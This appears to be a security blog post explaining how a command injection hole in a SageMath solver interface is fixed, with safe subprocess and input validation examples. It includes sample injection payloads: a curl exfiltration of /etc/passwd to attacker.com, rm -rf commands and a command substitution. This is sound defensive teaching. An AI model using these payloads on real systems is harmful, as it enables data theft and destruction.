How do you prevent OS command injection in Python?

Pass arguments to `subprocess` as a list rather than a single string, and never use `shell=True` with user-controlled input. If shell features are genuinely needed, validate every input against an allowlist and quote it (for example with `shlex.quote`) before use.

What CWE is OS command injection?

OS command injection is classified as CWE-78: Improper Neutralization of Special Elements used in an OS Command.

Is input validation alone enough to prevent OS command injection?

No. Input validation (e.g., allowlists) is a strong mitigation but should be combined with avoiding `shell=True` and using structured argument lists. Defense in depth is essential because regex-based filters for complex mathematical expressions can have edge cases that let malicious input through.

Can static analysis detect OS command injection?

Yes. Tools like Semgrep, Bandit, and CodeQL can trace tainted data flows from user input to dangerous subprocess sinks and flag unsafe `shell=True` usage, which is exactly how Orbis AppSec detected this vulnerability.

Fixing OS Command Injection in SageMath: How Shell Metacharacter Attacks Work and How to Stop Them

Q: What is OS command injection?

OS command injection (CWE-78) occurs when user-controlled data is embedded in a system command string and executed by a shell, allowing attackers to append or substitute their own commands using metacharacters like `;`, `|`, `&&`, or `$()`.

Introduction

Mathematical computing environments like SageMath are powerful tools—they execute complex symbolic algebra, solve polynomial systems, and interface with a rich ecosystem of external solvers. But that power comes with responsibility. When a system bridges user-supplied mathematical expressions and OS-level process execution, the attack surface expands dramatically.

This post breaks down a critical command injection vulnerability that was recently patched in drsolve_sage_interface.sage. Even if you've never written a line of SageMath code, the underlying lesson applies to virtually every language and platform: never let untrusted input touch a shell command without rigorous sanitization.

The Vulnerability Explained

What Is OS Command Injection?

OS Command Injection (classified as CWE-78) occurs when an application passes user-controlled data to a system shell or process executor without properly sanitizing it. The attacker's goal is to "break out" of the intended command and inject their own shell instructions.

Think of it like a math teacher asking students to fill in the blank:

Calculate the roots of: ___________

A well-behaved student writes x^2 - 4. A malicious one writes x^2 - 4; rm -rf /home/user.

That semicolon is a shell metacharacter—it tells the shell "finish this command, then run the next one." If the application blindly passes that string to a shell, both commands execute.

The Specific Issue: `subprocess.run` With Unsanitized Input

In drsolve_sage_interface.sage, two subprocess.run calls at approximately lines 294 and 300 were identified as vulnerable. The problem manifests when:

User-supplied polynomial or variable strings are incorporated into the command arguments.
The command is constructed via string interpolation (e.g., f-strings or + concatenation).
shell=True is used, or the argument list is built in a way that allows metacharacter interpretation.

Here's a simplified illustration of what vulnerable code might look like:

# ⚠️ VULNERABLE - Do not use this pattern
import subprocess

def solve_polynomial(user_poly_input):
    # User input flows directly into the command string
    cmd = f"external_solver --poly '{user_poly_input}'"
    result = subprocess.run(cmd, shell=True, capture_output=True)
    return result.stdout

At first glance, the single quotes around user_poly_input might seem protective. They're not sufficient. An attacker can escape them:

Input: x^2 - 4'; curl https://attacker.com/exfil?data=$(cat /etc/passwd); echo '

The resulting shell command becomes:

external_solver --poly 'x^2 - 4'; curl https://attacker.com/exfil?data=$(cat /etc/passwd); echo ''

Three separate commands now execute:
1. The intended solver, which now receives only x^2 - 4
2. An exfiltration request containing /etc/passwd
3. A harmless echo to close the syntax
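
The quote breakout can be checked without executing anything. The following is a minimal sketch, assuming a harmless stand-in payload and the illustrative `external_solver` name from the example above. It uses `shlex.split`, which models POSIX quoting rules only (it does not treat `;` as a command separator the way a real shell does), to show that hand-written quotes let the payload spill out of its argument while `shlex.quote` keeps it in one piece.

```python
import shlex

# Harmless stand-in for the attacker's input: it closes the quote early.
payload = "x^2 - 4'; echo INJECTED; echo '"

# Hand-written quotes: the payload's own quote ends the argument early.
naive_cmd = f"external_solver --poly '{payload}'"

# shlex.quote escapes embedded quotes so the payload stays one argument.
quoted_cmd = f"external_solver --poly {shlex.quote(payload)}"

# Split both strings using POSIX quoting rules (nothing is executed).
naive_tokens = shlex.split(naive_cmd)
quoted_tokens = shlex.split(quoted_cmd)

print(naive_tokens)   # the payload is spread across several tokens
print(quoted_tokens)  # three tokens; the last one is the payload, intact
```

Quoting is a fallback for the rare case where a shell is unavoidable. Passing a list with no shell removes the parsing step altogether.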

What's the Real-World Impact?

When exploited, this vulnerability could allow an attacker to:

Execute arbitrary commands with the privileges of the Sage/Python process
Read sensitive files from the server (configuration, credentials, private keys)
Establish reverse shells for persistent access
Pivot to internal network resources if the server has internal connectivity
Destroy data or disrupt service entirely

In a research or academic computing environment—where SageMath is commonly deployed—this could mean exposure of unpublished research, user credentials, or institutional infrastructure.

A Concrete Attack Scenario

Imagine a web application that accepts polynomial equations from users and uses this Sage interface to solve them:

1. Attacker submits a crafted polynomial: x^2 + 1$(id > /tmp/pwned)
2. Application constructs the subprocess command with this input embedded
3. Shell interprets $(id > /tmp/pwned) as a command substitution
4. id command executes, writing the current user's identity to /tmp/pwned
5. Attacker escalates: now knowing the process user, they tailor further attacks

This entire chain requires nothing more than HTTP access to the application's input form.

The Fix

What Changes Were Made?

The patch to drsolve_sage_interface.sage addresses the root cause: unsanitized user input reaching subprocess execution. While the exact diff was not included in the PR, the canonical fix for this class of vulnerability follows well-established patterns.

The core principles of the fix:

Eliminate shell=True — Pass commands as lists, not strings
Validate and sanitize inputs before they touch any process call
Use allowlists to restrict what characters are permissible in polynomial expressions

Here's what the transition looks like conceptually:

# ⚠️ BEFORE: Vulnerable pattern
def run_solver(polynomial_input, variable):
    cmd = f"sage_solver --input '{polynomial_input}' --var '{variable}'"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

# ✅ AFTER: Secure pattern
import re
import subprocess

# Allowlist of characters expected in a polynomial expression
SAFE_POLY_PATTERN = re.compile(r'[a-zA-Z0-9\s\+\-\*\/\^\(\)\.,_]+')

def sanitize_polynomial(poly_input: str) -> str:
    """Validate that input contains only safe mathematical characters."""
    if not poly_input or len(poly_input) > 1024:
        raise ValueError("Invalid polynomial input: empty or too long")
    # fullmatch anchors the pattern to the entire string
    if not SAFE_POLY_PATTERN.fullmatch(poly_input):
        raise ValueError("Invalid characters in polynomial input")
    return poly_input

def run_solver(polynomial_input: str, variable: str) -> str:
    # Validate inputs first
    safe_poly = sanitize_polynomial(polynomial_input)
    safe_var = sanitize_polynomial(variable)

    # Pass as list — shell=False by default, no interpolation
    cmd = ["sage_solver", "--input", safe_poly, "--var", safe_var]
    result = subprocess.run(
        cmd,
        shell=False,          # Critical: no shell interpretation
        capture_output=True,
        text=True,
        timeout=30            # Prevent resource exhaustion
    )
    return result.stdout
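
The patched example above validates the variable name with the same allowlist as the polynomial, which is more permissive than a variable name needs. As a hedged sketch, a stricter rule could accept a single ASCII identifier only. The `VARIABLE_NAME` pattern, the 64-character cap, and the helper names below are assumptions for illustration, not part of the actual patch.

```python
import re

# Hypothetical stricter rule for variable names: one ASCII identifier.
VARIABLE_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

def validate_variable(name: str) -> str:
    """Accept a single identifier such as 'x' or 'y_1'; reject everything else."""
    # fullmatch requires the whole string to match, so a trailing
    # newline or a leading dash is rejected.
    if len(name) > 64 or not VARIABLE_NAME.fullmatch(name):
        raise ValueError("Invalid variable name")
    return name

def is_valid(name: str) -> bool:
    """Convenience wrapper that reports validity instead of raising."""
    try:
        validate_variable(name)
        return True
    except ValueError:
        return False

for candidate in ["x", "y_1", "x+1", "--help", "x\n", ""]:
    print(repr(candidate), is_valid(candidate))
```

Rejecting a leading dash also keeps a value like `--help` from being read as an option by the program that receives it.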

Why This Works

Passing a list instead of a string is the single most important change. When subprocess.run receives a list and shell=False, Python starts the program directly (on POSIX, through an exec-family call in the child process) and hands each list element to it as a separate argument, verbatim. There is no shell involved, so metacharacters like ;, |, $(), and backticks have no special meaning. They're just characters.

# These two calls behave very differently:

# String + shell=True: Shell parses the entire string
subprocess.run("solver --poly x^2; rm -rf /", shell=True)
# → Shell sees two commands: solver --poly x^2 and rm -rf /
# → Executes solver, then rm -rf /

# List + shell=False: Arguments passed directly
subprocess.run(["solver", "--poly", "x^2; rm -rf /"], shell=False)
# → solver receives exactly one argument: the string "x^2; rm -rf /"
# → rm never executes
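
The verbatim hand-off can be observed directly. This is a small sketch in which a Python child process stands in for the external solver (an assumption made so the example runs anywhere) and simply prints the first argument it receives.

```python
import subprocess
import sys

# A tiny child program that prints the first argument it receives.
# sys.executable stands in for the external solver (demo assumption).
child = [sys.executable, "-c", "import sys; print(sys.argv[1])"]

hostile = "x^2; echo INJECTED"

# List form, no shell: the whole string arrives as a single argv entry.
result = subprocess.run(
    child + [hostile],
    capture_output=True,
    text=True,
    check=True,
)

received = result.stdout.rstrip("\n")
print(repr(received))
```

The child sees the semicolon and everything after it as ordinary text, because nothing along the way parses the string as shell syntax.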

Input validation with an allowlist provides defense-in-depth. Mathematical polynomial expressions have a well-defined character set: letters, digits, arithmetic operators, parentheses, and a few punctuation marks. Anything outside that set—especially shell metacharacters—should be rejected before it ever reaches the subprocess call.

Prevention & Best Practices

1. Never Use `shell=True` With External Input

This bears repeating: shell=True is almost never necessary, and almost always dangerous when user input is involved. The Python documentation itself warns against it.

# ❌ Dangerous
subprocess.run(f"process {user_input}", shell=True)

# ✅ Safe
subprocess.run(["process", user_input], shell=False)
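
A common reason for reaching for `shell=True` is a pipeline. As a rough sketch, the same effect can usually be had by running each stage as its own list-based call and passing the output along in Python. The two child programs here are placeholders written with `sys.executable` so the example is self-contained; they are not real solver tools.

```python
import subprocess
import sys

# Two small Python children stand in for real tools (demo assumption):
# the first prints three lines, the second upper-cases whatever it reads.
producer = [sys.executable, "-c", "print('x^2 - 4'); print('x + 1'); print('y')"]
consumer = [
    sys.executable,
    "-c",
    "import sys; sys.stdout.write(sys.stdin.read().upper())",
]

# Equivalent of `producer | consumer`, but no shell parses a command string.
first = subprocess.run(producer, capture_output=True, text=True, check=True)
second = subprocess.run(
    consumer,
    input=first.stdout,   # feed stage one's output to stage two's stdin
    capture_output=True,
    text=True,
    check=True,
)

print(second.stdout)
```

This buffers the intermediate output in memory, which is fine for small results. For large streams, connecting two `subprocess.Popen` objects through `stdout=subprocess.PIPE` avoids the buffering.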

2. Validate Inputs at the Boundary

Apply input validation as early as possible—ideally at the API or function boundary, before the data travels deeper into your application.

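import re

def validate_polynomial_expression(expr: str) -> str:
    """
    Allowlist-based validation for polynomial expressions.
    Permits: word characters, whitespace, arithmetic and comparison
    operators (= < > !), parentheses, dots, and commas.
    Rejects: quotes, ;, |, &, $, backticks, backslashes, and similar.
    Note: < > ! are meaningful to a shell, so this allowlist is only
    safe together with list-based subprocess calls (shell=False).
    """
    MAX_LENGTH = 2048
    # re.ASCII limits \w to [a-zA-Z0-9_]; fullmatch checks the whole string
    ALLOWED = re.compile(r'[\w\s\+\-\*\/\^\(\)\.,=<>!]+', re.ASCII)

    if len(expr) > MAX_LENGTH:
        raise ValueError("Expression exceeds maximum allowed length")
    if not ALLOWED.fullmatch(expr):
        raise ValueError("Expression contains disallowed characters")
    return expr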

3. Apply the Principle of Least Privilege

The process running your Sage interface should have only the permissions it needs—nothing more. Run it as a dedicated low-privilege user, use containers or sandboxing (e.g., seccomp, AppArmor, Docker), and restrict filesystem access.

Even if an injection attack succeeds, limited privileges dramatically reduce the blast radius.
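
One small, code-level piece of least privilege is limiting what the child process inherits. The sketch below passes an allowlisted environment to the child so that secrets held in the parent's environment are not visible to it. The variable names in `PASS_THROUGH` and the `DEMO_API_TOKEN` secret are illustrative assumptions; OS-level controls such as a dedicated user or a sandbox are still needed on top of this.

```python
import os
import subprocess
import sys

# Environment variables the child is allowed to see (illustrative allowlist).
PASS_THROUGH = {"PATH", "LANG", "LC_ALL", "LD_LIBRARY_PATH", "SYSTEMROOT"}

def minimal_env() -> dict:
    """Copy only allowlisted variables from the parent environment."""
    return {k: v for k, v in os.environ.items() if k in PASS_THROUGH}

# Simulate a secret living in the parent process (hypothetical name).
os.environ["DEMO_API_TOKEN"] = "not-a-real-secret"

# The child reports whether it can see the secret.
probe = [sys.executable, "-c", "import os; print('DEMO_API_TOKEN' in os.environ)"]
result = subprocess.run(
    probe,
    env=minimal_env(),
    capture_output=True,
    text=True,
    check=True,
)

child_sees_secret = result.stdout.strip() == "True"
print(child_sees_secret)
```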

4. Set Resource Limits

Always set timeouts and consider memory limits on subprocess calls to prevent resource exhaustion:

result = subprocess.run(
    cmd,
    shell=False,
    capture_output=True,
    text=True,
    timeout=30  # Seconds — prevents hanging processes
)
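
A timeout only helps if the caller handles the resulting exception. The following sketch wraps the call in a hypothetical `run_with_timeout` helper and treats an expired timeout as "no result". The child commands are placeholders built on `sys.executable`.

```python
import subprocess
import sys
from typing import Optional

def run_with_timeout(cmd: list, seconds: float) -> Optional[str]:
    """Return the command's stdout, or None if it exceeded the time limit."""
    try:
        result = subprocess.run(
            cmd, capture_output=True, text=True, timeout=seconds
        )
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child and waits for it before re-raising.
        return None
    return result.stdout

slow = [sys.executable, "-c", "import time; time.sleep(10)"]
fast = [sys.executable, "-c", "print('done')"]

print(run_with_timeout(slow, 0.5))
print(run_with_timeout(fast, 10))
```

Returning `None` is one design choice among several. Re-raising a domain-specific error may suit callers that need to distinguish a timeout from empty output.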

5. Use Structured APIs Over Shell Commands

Where possible, prefer calling solver libraries directly through their Python APIs rather than spawning subprocesses. SageMath itself has rich Python bindings—using them eliminates the subprocess attack surface entirely.

# Instead of shelling out to an external solver:
from sage.all import var, solve

x = var('x')
solutions = solve(x**2 - 4 == 0, x)

6. Log and Monitor

Implement logging for all subprocess invocations, including the arguments used (after sanitization). Anomalous patterns—unusual characters, unexpectedly long inputs, rapid-fire requests—can signal an active attack attempt.
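
As a minimal sketch of such logging, a thin wrapper can record each argument list before running it. The logger name and the `run_logged` helper are assumptions for illustration. `shlex.join` is used only to render the list unambiguously in the log line; the command itself still runs without a shell.

```python
import logging
import shlex
import subprocess
import sys

logger = logging.getLogger("solver.subprocess")  # hypothetical logger name

def run_logged(cmd: list) -> subprocess.CompletedProcess:
    """Run a command without a shell and record what was executed."""
    # shlex.join renders the argument list unambiguously for the log line.
    logger.info("running: %s", shlex.join(cmd))
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
    if result.returncode != 0:
        logger.warning("exit code %d from: %s", result.returncode, shlex.join(cmd))
    return result

logging.basicConfig(level=logging.INFO)
completed = run_logged([sys.executable, "-c", "print('ok')"])
print(completed.stdout)
```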

Security Standards and References

CWE-78: Improper Neutralization of Special Elements used in an OS Command
OWASP A03:2021 – Injection: Command injection falls under the broader injection category
Python subprocess documentation: Official guidance on safe subprocess usage
OWASP Input Validation Cheat Sheet: Comprehensive input validation guidance

Tools to Detect This Issue

Tool	Type	What It Finds
Bandit	SAST (Python)	`subprocess` with `shell=True`, string interpolation in commands
Semgrep	SAST	Customizable rules for injection patterns
CodeQL	SAST	Taint tracking from user input to dangerous sinks
Safety	Dependency scan	Known vulnerable package versions
Manual code review	Human	Context-aware analysis, business logic flaws

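Running a SAST tool like Bandit in your CI/CD pipeline can flag this pattern automatically. Note that Bandit's recursive scan looks for .py files by default, so .sage sources may need extra configuration to be included: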

# Add to your CI pipeline
pip install bandit
bandit -r . -t B602,B603,B604  # subprocess-related checks
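
To give a feel for what such a check does, here is a toy sketch built on Python's standard `ast` module that reports calls passing a literal `shell=True`. It is not how Bandit, Semgrep, or CodeQL are implemented. It does no taint tracking, and it only handles source that parses as plain Python. The `find_shell_true` name is made up for this example.

```python
import ast

def find_shell_true(source: str) -> list:
    """Return line numbers of calls that pass the literal keyword shell=True."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for kw in node.keywords:
            is_literal_true = (
                isinstance(kw.value, ast.Constant) and kw.value.value is True
            )
            if kw.arg == "shell" and is_literal_true:
                hits.append(node.lineno)
    return sorted(hits)

sample = (
    "import subprocess\n"
    "subprocess.run(cmd, shell=True)\n"
    "subprocess.run(['solver', arg], shell=False)\n"
)
print(find_shell_true(sample))
```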

Conclusion

Command injection vulnerabilities are deceptively simple in concept but devastatingly powerful in practice. The fix here—moving from shell-interpolated strings to properly structured subprocess lists, combined with allowlist-based input validation—closes a critical attack vector that could have given attackers a foothold into the entire system.

The key takeaways from this vulnerability and its fix:

shell=True is a red flag: If you see it in code that handles user input, treat it as a vulnerability until proven otherwise.
List-based subprocess calls are your friend: They bypass the shell entirely, so shell metacharacters in arguments are never interpreted.
Allowlists beat denylists: Defining what's allowed is more robust than trying to block every possible dangerous character.
Defense in depth matters: Input validation + safe APIs + least privilege means a single mistake is less likely to be catastrophic.
Automate detection: SAST tools can catch these patterns before they reach production.

Security vulnerabilities in mathematical computing tools can be easy to overlook—the focus is naturally on correctness of algorithms, not on the security of their interfaces. But any system that accepts external input and interacts with OS resources is a potential target. Building security in from the start, and reviewing it systematically, is the only reliable path forward.

This post is part of our ongoing series on real-world security fixes. Vulnerability details were responsibly disclosed and patched before publication. Always practice responsible disclosure when you discover security issues.

cwe	CWE-78
fix	Remove shell=True and pass arguments as a structured list, preventing metacharacter interpretation
risk	Arbitrary OS command execution with the privileges of the SageMath process
language	Python / SageMath (.sage)
root cause	User-supplied polynomial expressions concatenated into subprocess shell commands without sanitization
vulnerability	OS Command Injection via Shell Metacharacters

